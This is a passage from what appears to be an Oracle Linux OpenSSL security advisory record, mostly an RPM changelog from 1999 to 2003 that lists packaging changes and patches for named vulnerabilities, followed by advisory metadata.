Nalin Dahyabhai \n- re-enable optimizations on ppc64\n* Thu Sep 25 2003 Nalin Dahyabhai \n- remove exclusivearch\n[0.9.7a-20]\n- only parse a client cert if one was requested\n- temporarily exclusivearch for %{ix86}\n* Tue Sep 23 2003 Nalin Dahyabhai \n- add security fixes for protocol parsing bugs (CAN-2003-0543, CAN-2003-0544)\n and heap corruption (CAN-2003-0545)\n- update RHNS-CA-CERT files\n- ease back on the number of threads used in the threading test\n[0.9.7a-19]\n- rebuild to fix gzipped file md5sums (#91211)\n[0.9.7a-18]\n- Updated libica to version 1.3.4.\n[0.9.7a-17]\n- rebuild\n[0.9.7a-10.9]\n- free the kssl_ctx structure when we free an SSL structure (#99066)\n[0.9.7a-16]\n- rebuild\n[0.9.7a-15]\n- lower thread test count on s390x\n[0.9.7a-14]\n- rebuild\n[0.9.7a-13]\n- disable assembly on arches where it seems to conflict with threading\n[0.9.7a-12]\n- Updated libica to latest upstream version 1.3.0\n[0.9.7a-9.9]\n- rebuild\n[0.9.7a-11]\n- rebuild\n[0.9.7a-10]\n- ubsec: don't stomp on output data which might also be input data\n[0.9.7a-9]\n- temporarily disable optimizations on ppc64\n* Mon Jun 09 2003 Nalin Dahyabhai \n- backport fix for engine-used-for-everything from 0.9.7b\n- backport fix for prng not being seeded causing problems, also from 0.9.7b\n- add a check at build-time to ensure that RSA is thread-safe\n- keep perlpath from stomping on the libica configure scripts\n* Fri Jun 06 2003 Nalin Dahyabhai \n- thread-safety fix for RSA blinding\n[0.9.7a-8]\n- rebuilt\n[0.9.7a-7]\n- Added libica-1.2 to openssl (featurerequest).\n[0.9.7a-6]\n- fix building with incorrect flags on ppc64\n[0.9.7a-5]\n- add patch to harden against Klima-Pokorny-Rosa extension of Bleichenbacher's\n attack (CAN-2003-0131)\n[ 0.9.7a-4]\n- add patch to enable RSA blinding by default, closing a timing attack\n (CAN-2003-0147)\n[0.9.7a-3]\n- disable use of BN assembly module on x86_64, but continue to allow inline\n assembly (#83403)\n[0.9.7a-2]\n- disable EC algorithms\n[0.9.7a-1]\n- update to 0.9.7a\n[0.9.7-8]\n- add fix to guard against attempts to allocate negative amounts of memory\n- add patch for CAN-2003-0078, fixing a timing attack\n[0.9.7-7]\n- Add openssl-ppc64.patch\n[0.9.7-6]\n- EVP_DecryptInit should call EVP_CipherInit() instead of EVP_CipherInit_ex(),\n to get the right behavior when passed uninitialized context structures\n (#83766)\n- build with -mcpu=ev5 on alpha family (#83828)\n* Wed Jan 22 2003 Tim Powers \n- rebuilt\n[0.9.7-4]\n- Added IBM hw crypto support patch.\n* Wed Jan 15 2003 Nalin Dahyabhai \n- add missing builddep on sed\n[0.9.7-3]\n- debloat\n- fix broken manpage symlinks\n[0.9.7-2]\n- fix double-free in 'openssl ca'\n[0.9.7-1]\n- update to 0.9.7 final\n[0.9.7-0]\n- update to 0.9.7 beta6 (DO NOT USE UNTIL UPDATED TO FINAL 0.9.7)\n* Wed Dec 11 2002 Nalin Dahyabhai \n- update to 0.9.7 beta5 (DO NOT USE UNTIL UPDATED TO FINAL 0.9.7)\n[0.9.6b-30]\n- add configuration stanza for x86_64 and use it on x86_64\n- build for linux-ppc on ppc\n- start running the self-tests again\n[0.9.6b-29hammer.3]\n- Merge fixes from previous hammer packages, including general x86-64 and\n multilib\n[0.9.6b-29]\n- rebuild\n[0.9.6b-28]\n- update asn patch to fix accidental reversal of a logic check\n[0.9.6b-27]\n- update asn patch to reduce chance that compiler optimization will remove\n one of the added tests\n[0.9.6b-26]\n- rebuild\n[0.9.6b-25]\n- add patch to fix ASN.1 vulnerabilities\n[0.9.6b-24]\n- add backport of Ben Laurie's patches for OpenSSL 0.9.6d\n[0.9.6b-23]\n- own {_datadir}/ssl/misc\n* Fri Jun 21 2002 Tim Powers \n- automated rebuild\n* Sun May 26 2002 Tim Powers \n- automated rebuild\n[0.9.6b-20]\n- free ride through the build system (whee!)\n[0.9.6b-19]\n- rebuild in new environment\n[0.9.6b-17, 0.9.6b-18]\n- merge RHL-specific bits into stronghold package, rename\n[stronghold-0.9.6c-2]\n- add support for Chrysalis Luna token\n* Tue Mar 26 2002 Gary Benson \n- disable AEP random number generation, other AEP fixes\n[0.9.6b-15]\n- only build subpackages on primary arches\n[0.9.6b-13]\n- on ia32, only disable use of assembler on i386\n- enable assembly on ia64\n[0.9.6b-11]\n- fix sparcv9 entry\n[stronghold-0.9.6c-1]\n- upgrade to 0.9.6c\n- bump BuildArch to i686 and enable assembler on all platforms\n- synchronise with shrimpy and rawhide\n- bump soversion to 3\n* Wed Oct 10 2001 Florian La Roche \n- delete BN_LLONG for s390x, patch from Oliver Paukstadt\n[0.9.6b-9]\n- update AEP driver patch\n* Mon Sep 10 2001 Nalin Dahyabhai \n- adjust RNG disabling patch to match version of patch from Broadcom\n[0.9.6b-8]\n- disable the RNG in the ubsec engine driver\n[0.9.6b-7]\n- tweaks to the ubsec engine driver\n[0.9.6b-6]\n- tweaks to the ubsec engine driver\n[0.9.6b-5]\n- update ubsec engine driver from Broadcom\n[0.9.6b-4]\n- move man pages back to %{_mandir}/man?/foo.?ssl from\n %{_mandir}/man?ssl/foo.?\n- add an [ engine ] section to the default configuration file\n* Thu Aug 09 2001 Nalin Dahyabhai \n- add a patch for selecting a default engine in SSL_library_init()\n[0.9.6b-3]\n- add patches for AEP hardware support\n- add patch to keep trying when we fail to load a cert from a file and\n there are more in the file\n- add missing prototype for ENGINE_ubsec() in engine_int.h\n[0.9.6b-2]\n- actually add hw_ubsec to the engine list\n* Tue Jul 17 2001 Nalin Dahyabhai \n- add in the hw_ubsec driver from CVS\n[0.9.6b-1]\n- update to 0.9.6b\n* Thu Jul 05 2001 Nalin Dahyabhai \n- move .so symlinks back to %{_libdir}\n* Tue Jul 03 2001 Nalin Dahyabhai \n- move shared libraries to /lib (#38410)\n* Mon Jun 25 2001 Nalin Dahyabhai \n- switch to engine code base\n* Mon Jun 18 2001 Nalin Dahyabhai \n- add a script for creating dummy certificates\n- move man pages from %{_mandir}/man?/foo.?ssl to %{_mandir}/man?ssl/foo.?\n* Thu Jun 07 2001 Florian La Roche \n- add s390x support\n* Fri Jun 01 2001 Nalin Dahyabhai \n- change two memcpy() calls to memmove()\n- don't define L_ENDIAN on alpha\n[stronghold-0.9.6a-1]\n- Add 'stronghold-' prefix to package names.\n- Obsolete standard openssl packages.\n* Wed May 16 2001 Joe Orton \n- Add BuildArch: i586 as per Nalin's advice.\n* Tue May 15 2001 Joe Orton \n- Enable assembler on ix86 (using new .tar.bz2 which does\n include the asm directories).\n* Tue May 15 2001 Nalin Dahyabhai \n- make subpackages depend on the main package\n* Tue May 01 2001 Nalin Dahyabhai \n- adjust the hobble script to not disturb symlinks in include/ (fix from\n Joe Orton)\n* Fri Apr 27 2001 Nalin Dahyabhai \n- drop the m2crypo patch we weren't using\n* Tue Apr 24 2001 Nalin Dahyabhai \n- configure using 'shared' as well\n* Sun Apr 08 2001 Nalin Dahyabhai \n- update to 0.9.6a\n- use the build-shared target to build shared libraries\n- bump the soversion to 2 because we're no longer compatible with\n our 0.9.5a packages or our 0.9.6 packages\n- drop the patch for making rsatest a no-op when rsa null support is used\n- put all man pages into \nssl instead of \n- break the m2crypto modules into a separate package\n* Tue Mar 13 2001 Nalin Dahyabhai \n- use BN_LLONG on s390\n* Mon Mar 12 2001 Nalin Dahyabhai \n- fix the s390 changes for 0.9.6 (isn't supposed to be marked as 64-bit)\n* Sat Mar 03 2001 Nalin Dahyabhai \n- move c_rehash to the perl subpackage, because it's a perl script now\n* Fri Mar 02 2001 Nalin Dahyabhai \n- update to 0.9.6\n- enable MD2\n- use the libcrypto.so and libssl.so targets to build shared libs with\n- bump the soversion to 1 because we're no longer compatible with any of\n the various 0.9.5a packages circulating around, which provide lib*.so.0\n* Wed Feb 28 2001 Florian La Roche \n- change hobble-openssl for disabling MD2 again\n* Tue Feb 27 2001 Nalin Dahyabhai \n- re-disable MD2 -- the EVP_MD_CTX structure would grow from 100 to 152\n bytes or so, causing EVP_DigestInit() to zero out stack variables in\n apps built against a version of the library without it\n* Mon Feb 26 2001 Nalin Dahyabhai \n- disable some inline assembly, which on x86 is Pentium-specific\n- re-enable MD2 (see http://www.ietf.org/ietf/IPR/RSA-MD-all)\n* Thu Feb 08 2001 Florian La Roche \n- fix s390 patch\n* Fri Dec 08 2000 Than Ngo \n- added support s390\n* Mon Nov 20 2000 Nalin Dahyabhai \n- remove -Wa,* and -m* compiler flags from the default Configure file (#20656)\n- add the CA.pl man page to the perl subpackage\n* Thu Nov 02 2000 Nalin Dahyabhai \n- always build with -mcpu=ev5 on alpha\n* Tue Oct 31 2000 Nalin Dahyabhai \n- add a symlink from cert.pem to ca-bundle.crt\n* Wed Oct 25 2000 Nalin Dahyabhai \n- add a ca-bundle file for packages like Samba to reference for CA certificates\n* Tue Oct 24 2000 Nalin Dahyabhai \n- remove libcrypto's crypt(), which doesn't handle md5crypt (#19295)\n* Mon Oct 02 2000 Nalin Dahyabhai \n- add unzip as a buildprereq (#17662)\n- update m2crypto to 0.05-snap4\n* Tue Sep 26 2000 Bill Nottingham \n- fix some issues in building when it's not installed\n* Wed Sep 06 2000 Nalin Dahyabhai \n- make sure the headers we include are the ones we built with (aaaaarrgh!)\n* Fri Sep 01 2000 Nalin Dahyabhai \n- add Richard Henderson's patch for BN on ia64\n- clean up the changelog\n* Tue Aug 29 2000 Nalin Dahyabhai \n- fix the building of python modules without openssl-devel already installed\n* Wed Aug 23 2000 Nalin Dahyabhai \n- byte-compile python extensions without the build-root\n- adjust the makefile to not remove temporary files (like .key files when\n building .csr files) by marking them as .PRECIOUS\n* Sat Aug 19 2000 Nalin Dahyabhai \n- break out python extensions into a subpackage\n* Mon Jul 17 2000 Nalin Dahyabhai \n- tweak the makefile some more\n* Tue Jul 11 2000 Nalin Dahyabhai \n- disable MD2 support\n* Thu Jul 06 2000 Nalin Dahyabhai \n- disable MDC2 support\n* Sun Jul 02 2000 Nalin Dahyabhai \n- tweak the disabling of RC5, IDEA support\n- tweak the makefile\n* Thu Jun 29 2000 Nalin Dahyabhai \n- strip binaries and libraries\n- rework certificate makefile to have the right parts for Apache\n* Wed Jun 28 2000 Nalin Dahyabhai \n- use %{_perl} instead of /usr/bin/perl\n- disable alpha until it passes its own test suite\n* Fri Jun 09 2000 Nalin Dahyabhai \n- move the passwd.1 man page out of the passwd package's way\n* Fri Jun 02 2000 Nalin Dahyabhai \n- update to 0.9.5a, modified for U.S.\n- add perl as a build-time requirement\n- move certificate makefile to another package\n- disable RC5, IDEA, RSA support\n- remove optimizations for now\n* Wed Mar 01 2000 Florian La Roche \n- Bero told me to move the Makefile into this package\n* Wed Mar 01 2000 Florian La Roche \n- add lib*.so symlinks to link dynamically against shared libs\n* Tue Feb 29 2000 Florian La Roche \n- update to 0.9.5\n- run ldconfig directly in post/postun\n- add FAQ\n* Sat Dec 18 1999 Bernhard Rosenkrdnzer \n- Fix build on non-x86 platforms\n* Fri Nov 12 1999 Bernhard Rosenkrdnzer \n- move /usr/share/ssl/* from -devel to main package\n* Tue Oct 26 1999 Bernhard Rosenkrdnzer \n- inital packaging\n- changes from base:\n - Move /usr/local/ssl to /usr/share/ssl for FHS compliance\n - handle RPM_OPT_FLAGS", "edition": 1, "modified": "2019-08-16T00:00:00", "published": "2019-08-16T00:00:00", "id": "ELSA-2019-4747", "href": "http://linux.oracle.com/errata/ELSA-2019-4747.html", "title": "openssl security update", "type": "oraclelinux", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}]}